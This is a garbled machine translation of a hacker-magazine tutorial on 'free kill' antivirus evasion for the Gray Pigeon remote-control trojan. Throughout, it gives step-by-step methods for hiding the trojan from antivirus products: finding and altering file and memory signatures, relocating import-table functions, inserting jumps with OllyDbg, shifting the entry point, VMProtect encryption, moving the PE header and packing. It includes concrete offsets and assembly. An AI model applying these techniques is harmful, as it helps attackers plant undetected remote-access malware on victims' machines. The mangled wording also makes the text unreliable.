Trojan free kill Raiders-a vulnerability warning-the black bar safety net


Article author: A1Pass Information source: evil octal information security team www.eviloctal.com) **Note: this article has been published in the hacker X-Files vol 7 issue of the magazine, with the original there is a little discrepancy, by the author submitted to the evil octal Forum, such as the need to reprint, please retain this information!** Since the virus with antivirus software since the birth of the war between them will never stop...... Multiple sets of signatures, automatic shelling, memory, anti-virus, Proactive Defense, etc. the emergence of network security has made a contribution, of course, the hackers also no less, also appeared to modify the characteristics of the code, plus the double metamorphosis shell, go to file top new[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technology. The Ancients cloud“know thyself, only know yourself now!” Today, we're in a viral Defense workers perspective to make our[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)to work. Want to not be killed, it is necessary to know is how to kill, also not too understand the friends hastened secretly took the opportunity to brush up. **1. Antivirus principles** Usually, a virus Defense workers to get to the one intercepted or reported up the virus, the first is to analyze the virus file after the execution of the operation, the so-called“action”, refers to a virus file after the execution of the will do which actions. For example, will generate what the new file, how to change the registry, how to register the service, open what port, and so on. Understand these, the next step will generally be to study this virus in the file structure, and then find a unique place, which is defined as the feature code. While this feature of the code definition of good or not, depends on his definition of the position is tricky, for example, if he defined The is the virus files to change the registry key value of that part of the code words, which is obviously not too hard! Because as long as the virus file change the key value, 9 9% of the cases in this file must exist is change the key value of the string, so find this string in the position you can define the characteristics of the code. But for this feature code to do the[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)is very easy, simply find the appropriate location, and change the case of letters. And if from the the file header to identify a segment feature code is very not easy thing....... In addition, the definition of the feature code there is a branch, i.e., the memory feature of the code. The so-called memory feature code refers to the Trojan file to run after the release of the memory when the presence of the feature, it works generally with the above description of the file features code. When the feature code is defined, it will be submitted to another Department, and then into the virus definition database, when the user updates, after antivirus in hit to meet the requirements of the file when it will be without melancholy kill it! That is, the antivirus software only recognize the feature code does not recognize the file. Thus, virus Defense workers looking for a signature way also just so so, but this is just the definition of virus file to the signature of the work, other for example, repair infected files and other technical steps and this article is irrelevant, in that it does not introduce, interested friends can own research. **2. [Free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)tags** [Free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)there are many ways, but didn't see what for friends comprehensive system description, but also suffer the side dishes are studying without the door, had to dig the silver look for the“master”, so I volunteered to stand out at once, the inadequacies also please master forgive me...... My personal summary of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method a total of two categories, namely active[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)and the passive[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm> a). _ A, Active[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)_ 1. Modify character traits: take the initiative to find possible features of the code, including a Trojan file to modify the registry, generating a new file name with the path, the injection of the process name, and other actions, including running in the process may appear or will appear in the character files like characteristics. Then find out these characters, and their modifications. 2. Modified input table: find this file in the input table function name, API Name, and shift. 3. Disrupt the file structure: the use of the jump JMP, the disrupted file the original structure. 4. Modify the entry point: the file of the entry point plus 1. 5. Modified PE: the PE segment is moved to the blank position _ Second, the passive[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)_ 1. Modify the characteristics of the code with some tool to find the feature code and the feature code to do the[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)processing. 2. With Vmprotect: using Vmprotect encrypted segments. 3. File packers: you can use some of the more rare of the shell of the Trojan file to be protected. Some friends see here may Simon, PE, Vmprotect, entry point...... These are what do you mean? Don't worry, below I will introduce, as soon as you finish reading this article, you will be[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)master! How? Go! **3. Practical exercises** **1.) Modify character features** Well, here we are still in a virus Defense workers point of view to consider our every step what should be done, and then in the use of reverse thinking to divide and conquer. Now, if we get a Trojan sample dove gray, first of course you want to analyze it what is the function, how to run and how to protect yourself. In fact, this step requires the expertise is a lot, but considering our readers, We for the time being with a relatively simple and easy method--run the Trojan AND view the help for this program document. We open RegSnap, create a new snapshot, open the RegSnap, click on the[new snapshot]button as shown in Figure 1, in the pop-up dialog box, select the[Generate for all items snapshot](Fig 2)。 And then save the snapshot, and now has the RegSnap configured, the following running our Trojan program reminder: do[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>), be sure to remember to raise good always good habits, to prevent modification errors or experimental runtime destroy, remove Trojan one. Trojan is finished, we follow the above method to re-make a snapshot and save, and then press the shortcut key F5, in the pop-up“compare snapshot”dialog box, select the just save the snapshot, in the“first snapshot”, select the one we just first save a snapshot, and“second snapshot”of the selection we saved a snapshot of the archive, and soon the results came out, such as Figure 3)。 Some friends for the use RegSnap to information collected feel powerless to analyze, Complain collected too many things, here I will briefly introduce, first of all it should be noted that the comparison between two snapshots of time to be as short as possible, in addition to you want to exclude with a OpenSaveMRU registry key value, also to exclude for*. rsnp file to create a read and write operation records. Below we will useful information is extracted, one by one analysis. The list of files to C:\WINDOWS\\*.* New file 木马 .exe Registry report The new primary key HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\A1Pass-admin\desktop\huigezi\cover member Server02.exe Key value: string: "a covering member Server02" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_*6 7 2 8*9A6C*670D*52A1\0 0 0 0\Class Key value: string: "LegacyDriver" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_*6 7 2 8*9A6C*670D*52A1\0 0 0 0\ClassGUID Key value: string: "{8ECC055D-047F-11D1-A537-0000F8753ED1}" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_*6 7 2 8*9A6C*670D*52A1\0 0 0 0\Control\ActiveService Key value: string: "Trojan service" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Trojan\Description Key value: string: "dove gray service end of the program. Remote monitoring and management." ...... Here I only excerpted some of the key properties of Trojan action records, all records please see the disc. Through the file list we can know Trojan in the WINDOWS directory under the generate a new file and through a registry of monitoring information we also know the Trojans is what will register itself as System Service and run automatically. Then we go back to the rising of research and analysis in the Chamber, look at those big brother big sister who will do...... Rising Big Brother:“recently this dove gray is too rampant! Shouldn't we be more defined sets of characteristics?” Rising sister,“well, good! First in the registry that define a set feature code in said bar.” A1Pass:“STOP it!!” Only see the screen suddenly freeze, the A1Pass the player is minimized.) Through the above dialogue, we can know them to the registry of a character is defined as the characteristic code from the above RegSnap analysis out of the records, their selection is really too much! Then they would actually be used to what? In fact, just as a hacker is concerned, as long as does not affect the service end of normal operation, it should as much as possible to get rid of Trojan all the characters, of course, all change is impossible, unless you Write your own Trojan. Some friends want to go, in addition to the registry, don'tIt can not be modified? The answer of course is negative, such as generating a new file name with the path, the injected process name, etc. actions, which we can take advantage of the WINDOWS of the alphabet is not case-sensitive this feature is a direct replacement for the uppercase and lowercase letters, and for running the process may appear or will appear in the characters such as we can directly replace it with other content. Below I show you how to change the injection process of the name. First configure the service side, by Figure 4 we can see gray pigeons start to run is required“IEXPLORE.EXE”this process, according to the registry of reasoning, we can assume that its not the shell server is should exist“IEXPLORE.EXE”this is a string. That being the case, we will first give out our first weapon“WinHex” is! WinHex is a extremely famous 1 6 hexadecimal editor. Get ZDNetSoftwareLibrary five-star highest rating, has a powerful system utility. Here, we only use it to edit the file, the rest do not do too much discussion. First, we use WinHex to open our Trojan file“Server.exe”that opens as shown in Figure 5. Then we press[Ctrl]+[F]shortcut to call out the Find Text dialog box, enter IEXPLORE. EXE after click“Yes”(as shown in Figure 6)。 The results shown in Figure 7. Here we are on its case conversion, use the mouse to click to change letters, for example I, and then in the key on the disc i, You can complete the change, just like using WINDOWS Notepad. Change is completed, press[Ctrl]+[S]shortcuts can be saved. It's that simple? Yes! It's that simple! Other such as the registry, generate a new file name with path, etc. can use this method to change. But unfortunately, after such a change, but also inadequate to deal with such as Kingsoft, the river people and other brands of antivirus software to deal with these virus killing, we also need for our Trojan horse for further processing. In the following, we start learning the input table function APIName)[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) it! **2.) Modify the input table** Don't have the friends know that the PE file's normal operation is inseparable from the internal input table of the function, and the different procedures, the internal input table the name of the function and the location in the file is not the same, so the input table function also became viral Defense workers in the production of the feature code on one. Before I found out about the Dove gray of the signature view,“the rising big brother”has to be one of the input table as a function of the feature code. So the master input table function of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)tips for new entry-friends to say it is imperative to! [PE files tip: PE file is a WINDOWS System a unique file structure, which includes the PE file header, the input table and related resource files, etc.] After my test, direct the individual to modify the file inside the input table function will cause the program to run abnormally or even crash! There is no way? I can not so easily throw in the towel now! After a turn of bitter struggle, finally let me in LordPE to find a solution, while FoBnN the article also gave me very big inspiration...... We first open the LordPE, click on the[PE editor]button in the pop-up dialog box, select the Trojan file, open and click[directory], shown in Figure 8, and then click on the import table behind [...] such as Figure 9. The In the pop-up dialog box, we choose wininet. dll under InternetOpenUrlA such as Figure 1 0, and some friends want to ask, why the non-selected InternetOpenUrlA this input table function? Huh! That's because the input table has a feature code Oh, about how to determine the characteristics of the code, I later will introduce, you first do not worry。 Well, about LordPE on the first stop here, next we'll use WinHex to find InternetOpenUrlA this input table function of the location, and with 0 padding operation method: click WinHex to the right of the 1 6-ary information, the input 0 can be)(as shown in Figure 1 1, A 1 2 in. And then write it to a blank area of either display 0 0 0 0 0 0 the area, be sure to start from the beginning written, so that later to calculate the address when the error-prone, in addition to also pay attention to the input table function of the case do not make a mistake such as Figure 1 3 in. After saving us in the back to LordPE there, in the need to change InternetOpenUrlA input table function on the right-click, in the pop-up menu, select“Edit”, the Thunk of information into 000B9D5E such as Figure 1 4. Some friends want to go, we have just not put that to the input of the table function into the 000B9D60 there? To this How to become 000B9D5E? In fact the principle is very simple, because each input table function of the previous is a space, although we don't really get that space added to the list, but fill in its address must be empty, otherwise it will go wrong! And the 000B9D60 minus a space occupied by the location, its address is exactly 000B9D5E, but also not very understand friends in a closer look at Figure 1 3, here we are in back to LordPE, check out our turn of the input table function into what the as shown in Figure 1 5 be? So what do we do? Its simple really, as long as the re-change the input table the name of the function can be as in Figure 1 6 in. Sometimes because we fill in the address to compare against later, such as we have now modified this 000B9D5E, the latter can only accommodate two bytes, so change the input to table functions can only type two words, for this case we can put the Thunk in the information changed as 000B9D60 this starting address, change the input table function name change after completion in the 000B9D60 change back to the original values both 000B9D5E, save after the success, we try to see if Figure 1 7 in. After the quiz the pigeon of all its functions are normal! With rising check try, shown in Figure 1 8, The result is of course self-evident...... **3.) Modify the characteristics of the code** Although to this we are[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)has been successful, but in order to learn more of the art, in order to make our[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)pigeons survive longer, below I introduce for everybody signature look with the Modify tricks. Signature is antivirus software of the heart, but also is our heart! It all depends on who first find each other the center of the earth dirty, and could issue a fatal blow, who is the winner! A reference to look up a feature code, you have to talk about the MyCCL with the CCL, the two The name of the software believe that mindfulness through the[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technology friends not unfamiliar, but since the software operation of a fool, often times for CCL description Just in passing, it can be hard to get started friends! This section I will first introduce the MyCCL usage...... We first come to know about MyCCL as in Figure 1 9, According to this map we are following is to generally introduce the MyCCL the application of the method. First click on the 1 at the Select the file, then in the first 2 at the input block a number, block the number, the more a positioning more accurate, however, to generate the speed but also the slower, the resulting files total volume is greater, just like dove gray so much of the service side, if the sub block number is 3 0 0, then it generates a file the total volume will be more than 230M in! So here is not recommended to fill in too large of numbers, typically as dove gray such service end points the number of blocks filled 4 0 0 A is sufficient. Generated after completion will pop up a dialog box to remind you to go to the corresponding directory, anti-virus, shown as“E:\ 文章 \ 极度[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\Pigeon\OUTPUT”folder We to that folder under the start antivirus search to virus let the virus be completely removed, note that this is very important! After treatment is completed click on the first 3 at the secondary treatment, in the click the[generate]the above[features section]button appears to the right of the dialog box. Here we are in the“interval setting”in right-click the feature code range, in the pop-up menu, select“composite precise positioning here features”such as Figure 2 0, and then repeat the above operation until you think[units of length]is already small to easily change the time signature positioning even over. Okay, in one breath say so much, don't know just getting started with friends whether know some MyCCL the usage of a no...... However, above we locate the file signature, there is a memory feature of the code is not defined, here we want to use to the CCL of the memory feature of the code location function, open the CCL, we choose[File]→[signature test test]→[memory feature code], shown in Figure 2 1 in. In the pop-up dialog box, select we want to be[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)the operation of the Trojan, and then will enter the“positioning of the range select Window”as shown in Figure 2 2 in. Seen from the figure, the first CODE segment offset 0 0 0 0 0 4 0 0, that is we can use 0 0 0 0 0 4 0 0 as the starting location, then I it in the user input area of the“starting position”at fill 0 0 0 0 0 4 0 0, the following that the test measured the size of how to fill in? See Figure 2 2. draw the line that the“current file size”? We can use the WINDOWS system comes with the calculator to calculate, the calculator in the“View”menu is set to scientific, hexadecimal, four words as shown in Figure 2 3 in. Then with the current file size value by subtracting the starting value 0 0 0 0 0 4 0 0, the results obtained for 000B9A00, then we in the“test-test-size”rear fill 000B9A00, and then click on the“Add section”button as shown in Figure 2 4 in. Finally click OK in the new pop-up dialog box, click Run, but it needs to be noted that, during this operation be sure to open the antivirus software and all the features. Below you have to do is wait...... However light to find the feature code is not enough, we also have to learn how to change, and about the characteristics of the code change is very knowledgeable! Here, for the convenience of our readers can apply what they learn, this is my only introduction to the theory of knowledge, focusing on practice operations, but I want to please everyone note that[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method like you do[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)the Trojan horse as a survival time, and through this time, this kind of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method becomes not practical, or[Free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)the effect is greatly reduced it! So in order to truly become a[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)master, also lay the basic functions, and constantly create a new[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)methods, because we are in and the antivirus software vendor of professional skill“Battle of wits”! About problems that need attention will first speak of this, here I take you first to find out the current change pattern approach. _1\. Case replacement only applies to the file[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm> the)_ Suitable for: the emergence of recognizable English letters or phrases, and determines that it is not related to functions such as input of the table function. Operation method: such as our“combat exercises”in the first section speaks of the same, only the case to replace what you can, for example, the feature code appears in the A, you just replace it with a can. Principle: the use of WINDOWS system is not case sensitive, and the antivirus but the case is very sensitive to the characteristics of the reach[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)purpose. _2. 0 0 filled _ Suitable for: almost any situation, but the success rate is not very high. Method of operation: for example, we found a feature code 0009EE7F_00000005, then according to this feature of the code information, we can know its position in the 0009EE7F, the size of 5 bytes, which is 0009EE7F-0009EE83 this section of the content, as shown in Figure 2 5 in. Have been following articles in practice the operation of the friends certainly have a question, How did you find that address? And I can't find? That's because WinHex the default offset for the decimal mode, we click in the Offset column to change it to 1 6 decimal mode, shown in Figure 2 6 in. Then we have the choice of a everywhere to with 0 0 padding as shown in Figure 2 7 in. Remember to try a few times 8 0% of the cases you can find one at both[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)also does not affect the normal running of the area. For the definition of out-of-memory feature code, as long as its memory address with the one called the cheap energy Converter of the applet is converted into 1 6-ary offset, and then performing the appropriate operation. Principle: due to the PE file of a special format, and a program compiled language and other issues, so that the generated object code efficiency is not high, inevitably there is some“junk information”, and these information exists or not with whether the program can run normally does not play a decisive role, and when the Trojans this part of the“junk information”is defined as the feature code, we can completely remove it, and the Delete method is used without any sense of 0 0 will be replaced. _3. Jump to a blank area of the _ Suitable for: almost any case, the success rate is relatively high. Operation method: or in the feature code 0009EE7F_00000005 as an example, if we use 0 0 the fill method fails then don't think much, then immediately try OllyDbg on OllyDbg I do not introduced, it is very stick and very professional a Live disassembly/debugging tools, here we only use it to help us be[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)job, you should first do is the We the 1 6 hexadecimal offset 0009EE7F converted to a memory address, because OllyDbg works is the first program to release the memory space, and can be related to the job...here to use is one called the cheap energy Converter of the applet, we use the conversion is completed get memory address for 0049FA7F such as Figure 2 8 in. Here we use OllyDbg to open our Trojan service end, first find a blank area, and the domain to jot down this address 004A24A5, and then find we just converted over to the address 0049FA7F, the first to 0049FA7F start following these three lines of data is selected, and then click the right key is selected the[Copy]→[to the clipboard], shown in Figure 2 9 is. Copy it to the herein document backup, and then in these three lines of code one by one NOP out, such as Figure 3 0 to. Finally, right-click on the 0049FA7F in the pop-up dialog box, select compiled, and write“jmp 004A24A5”this assembler Directive as shown in Figure 3 1 in. Remember, click on the[compile]button before the first“use NOP padding”in front of the hook removed. Then we write down the compilation after 0049FA7F below that address 0049FA84(careful observation of Figure 3 1 in. Well, here we are back to 004A24A5 this just to find the blank address, as shown in Figure 3 2 in. Then use the just compiled method to the in this article document an alternate information sentence sentence to to compile it, and then in the last sentence of code of next line 004A24AA adding“jmp 0049FA84”this line of code, as shown in Figure 3 3 in. Then right-click→[Copy to executable file]→[all the changes] such as Figure 3 4 in. In the pop-up dialog box, select the“Copy all”and then save. And for the memory[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)eliminates the need for memory address translation this step. Principles: we look at Figure 3 to 5, seen from the figure, as this method is the name of the“jump to a blank area”, the principle of this method is the original containing signature information is transferred to the blank area, and the original location information of all NOP out, and where a jump instruction, so it jumps to 004A24A5, that is, we find a blank area, and put the original in 0049FA84 information moved to here, the completion of the addition information in the addition of an instruction in the jump back, to make the program coherent. _4. Upper and lower interchangeable _ Suitable for: almost any case, the success rate is relatively high. Operation method: first use OllyDbg to load the Trojan program, assuming their signatures for the 0009EE7F_00000005, we still first with the offset of the Converter will be converted to a memory address above we already know 0009EE7F corresponding memory address for 0049FA7F, and then in the OllyDbg to find the corresponding location, using the above“Skip to the blank area”in the description of the modification method will 0049FA7F upper and lower two lines of the code change position. And for the memory[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)eliminates the need for memory address translation this step. Original: antivirus of signature the positioning of is in strict accordance with the relevant offset to the memory address, and in fact our app in machine code order of execution has in General is not dead provisions, so we just turn it up and down interchangeably, the virus naturally don't know. _5. ADD and SUB are interchangeable _ Suitable for: in memory the feature codes appear in the ADD or SUB instruction, the success rate is relatively high. Method of operation: Use OllyDbg to load the Trojan program, assuming that its feature code corresponding to the address in the ADD or SUB instruction, for example, 00018A88 to: XXXXX 0 0 0 0 0 0 8 8 ADD ECX 1 0 0 0 0 0 0 0 We can ADD ECX 1 0 0 0 0 0 0 0 This section of machine code instead of SUB ECX F0000000, the Change after the completion of the Save As EXE file. Principle: we all know that 1+1=2, We also know that 1-(-1)=2, The above is the use of this principle, wherein the ADD instruction is the combination of thought, and SUB is the subtraction of the mean. Although we interchanged a bit, but the end result is still the same, but change the after antivirus software and just don't know. To here, on the feature code lookup and modify it finished, but in addition? The answer is there many times! Below we take a look at the other[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method. **4.) Other[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method** _ Change the file header:_ Here, the modification of the file header includes added head to head, the file is added to spend. On the plus head to head, we still use OllyDbg to. With OllyDbg loaded, OllyDbg will automatically stop at the entry point as shown in Figure 3 6 in. We will head three lines of machine code to copy saved, and then find a blank area, with a compilation of the methods one by one which write as shown in Figure 3 7 on. And then later writes a JMP instruction, so it jumps to the initial entry point of the fourth line, I believe has been carefully look at this article friends must understand its principles, if you forget then you can look above to modify the signature of the third method, the principle with this almost, modified after the completion is as follows: 004A2A73 0 0 0 0 add byte ptr ds:[eax],al 004A2A75 0 0 0 0 add byte ptr ds:[eax],al 004A2A77 5 5 push ebp 004A2A78 8BEC mov ebp,esp 004A2A7A B9 0 4 0 0 0 0 0 0 mov ecx,4 004A2A7F ^ E9 CCF3FFFF jmp Server. 004A1E50 004A2A84 0 0 0 0 add byte ptr ds:[eax],al 004A2A86 0 0 0 0 add byte ptr ds:[eax],al 004A2A88 0 0 0 0 add byte ptr ds:[eax],al Above the add byte ptr ds:[eax],al is a so-called blank area, we see the change after the header file is located in the 004A2A77, so we also want to use PEditor change the entry point, open PEditor after loading the file, the entry point at address to our new file head address 004A2A77 such as Figure 3 8, save after. _ The entry point plus a 1:_ Open PEditor after loading the file, the original entry point+1 can be, for example, our entry point for 004A2A77, the plus 1 should be 004A2A78 such as Figure 3 to 9, and then click on the“Apply Changes”to complete the change. With this simple[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method can easily deal with most of the antivirus software. With Vmportect encryption: Vmportect is a next generation Software Protection program, the use of virtual machine protection code, you can specify the portion of the segment is encrypted, will allow protected procedures to complicate the very beginning he was for PcShare. SYS file[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>), the effect is commendable! In fact, for ordinary files, he still played relatively outstanding! Here we use it to encrypt our that presence of a feature code to 0049FA7F the start of the segment. Open Vmportect after loading the app in the“dump”tab of any place to click by the button, in the pop-up menu, select“Go to address”such as Figure 4 0 to. Then in the pop-up dialog box, fill in the 0049FA7F, click on the“Yes”button to jump to the appropriate location, and then click on the“Add address”button as shown in Figure 4 1 It. And selected is can be, and finally click on the“Edit”button to 0049FA7F at the beginning of the segment for the encryption as shown in Figure 4 2 in. _ Mobile PE segment location:_ On this method, but must learn! Today take the opportunity to contribute to the dear friends, hope this method can be in your[FREE to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)to help you find it! Then modify the PE section what can play what role? First, of course, can achieve long-term[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)object, and secondly can protect our[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)file, other people can not learn to walk our[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method A1Pass: to really achieve this purpose, in addition you also can not let others see this post, so this period of the X-files quickly the whole package! Huh! in. Why? Because some of the disassembly tool fails to load after modifying the PE file header of the program. We first look at the PE section, do you see? First with WinHex to load our Trojan such as Figure 4 3 in. See Figure PE those two words? This two-word P-position where is the PE section of the entry point, I here is 0 0 0 0 0 1 0 to 0. We take a closer look at Figure 4 3, look at the PE of the next row of the first 1 6-ary is not E0 for? Well, here we use the WINDOWS system comes with the calculator a bit, get the 1 6 hexadecimal E0 is decimal 2 2 to 4. What does this mean? It was on the PE the size of the segment, in the WinHex line can display 1 to 6 characters 2 2 4 characters is exactly 1 Line 4, We will this 1 row 4 copy the contents of the saved, and remember that PE period at the end of the address, I here is 000001EF, and finally this PE period with 0 padding as shown in Figure 4 4 in. Finally, we pre-stored the PE section on the move, but be careful not to exceed the“This program must be run under Win32”this piece of content. Since the PE section of the on the move, its volume is necessarily also increases, while the From we now the PE section of the 0 0 0 0 0 0 8 0 to 000001EF, a total of 3 6 8 bytes, into 1 6-ary 1 7 0, all the change is completed as shown in Figure 4 and 5 shown in Fig. _ For the Swiss Star:_ First with OllyDbg to load the file, as long as it is the first machine code push ebp instead of pop ebp can be hide from the rising of the memory antivirus. _ The packers compression:_ The packers Rookie of the patent, although the operation is simple, but the[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)effect and“message quality”are unsatisfactory, but finished[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)after the in a compression of the housing is still very necessary. The packers[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)the first step is to find good housing, we're okay to see snow Forum around, he was there often to have a good Shell to appear. But on the plus housing some of the steps here I would not charge the ink, and you go on your own to see will, in fact, is a use of a software process. Well, here We of the Trojans[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)it finished, a total of seven categories Total 1 4 kind of way! I am afraid that time is understood together more difficult. Below I just used“Soviet-style education”approach to readers planning out herein speak of knowledge, convenient for readers after the application and find. **[Free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)operation sequence:** 1. Take the initiative to find the possible presence of the feature code 2. With CCL, etc. find the feature code and change it 3. As much as possible of changes to input table function 4. Change the file header 5. Vmportect segment encryption 6. Mobile PE segment position 7. The packers compression **[Free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)analysis:** _ First, take the initiative to find possible features of the code _ Operation note: for the registry, the file path information only the best-case alternative method, do not change the other content, as error-prone. Advantages: can prevent future occurrence of the feature codes, and can simultaneously experience the fun of DIY, the way to create their own“special Trojan” in. Not enough: unable to perform effective of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>), the effect is not obvious. Success rate: almost 1 0 0%, as long as no correction place General changes after the program is fully operational. _ Second, try to change the input table function _ Operation note: the input table function is moved to a new location, the function name the first letter of the best in the Bank at the beginning, also note that the address of the fill rule, do not mistake. Advantages: can prevent future occurrence of feature code to feature Code of the positioning bring the interference. Not enough: unable to perform effective of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>), the effect is not obvious. Success rate: as long as the operation on the problem, the basic can guarantee that 9 0% or more! _ Third, for example, CCL and other tools to find the feature code and the feature code to change _ Operation note: this step need most is patience and attentive! Not losing, to timely make a backup in case of Emergency. Advantages: targeted is very strong, [free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)the most effective method. Not enough: only for one antivirus be[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>), not for a plurality of antivirus software for the job, [free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)file of the survival period is short. In addition, this method is also very time consuming. Success rate: in theory, 1 0 0% mainly to see your experience with programming, compilation of Foundation on. But in fact, as long as there is sufficient experience with the method, the success rate is abnormally impressive! _ Fourth, the mobile PE short position _ Operation Note: 1 6 nearly made the conversion must be attentive, and time don't forget at the Start and end position. Advantages: can be extended[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)period, when dealing with the feature code in the PE file header of the Nirvana now! At the same time can protect us the[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)file, other people can not learn to walk our[free kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)method. Not enough: in addition to the addition of the outer shell, it is not in the Trojan file to do further processing. Success rate: about 7 5%, not to determine too many factors...... _ Five, change the file header _ Operation note: to delete part of the information when the file structure changes. Advantages: compare to save time, [free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)the effect is also very obvious, is[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)in an efficient way. Does not meet: the[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)not for long. Success rate: about 8 0 per cent. I just change the entry point. Jump down on it. The effect is okay. The most simple way.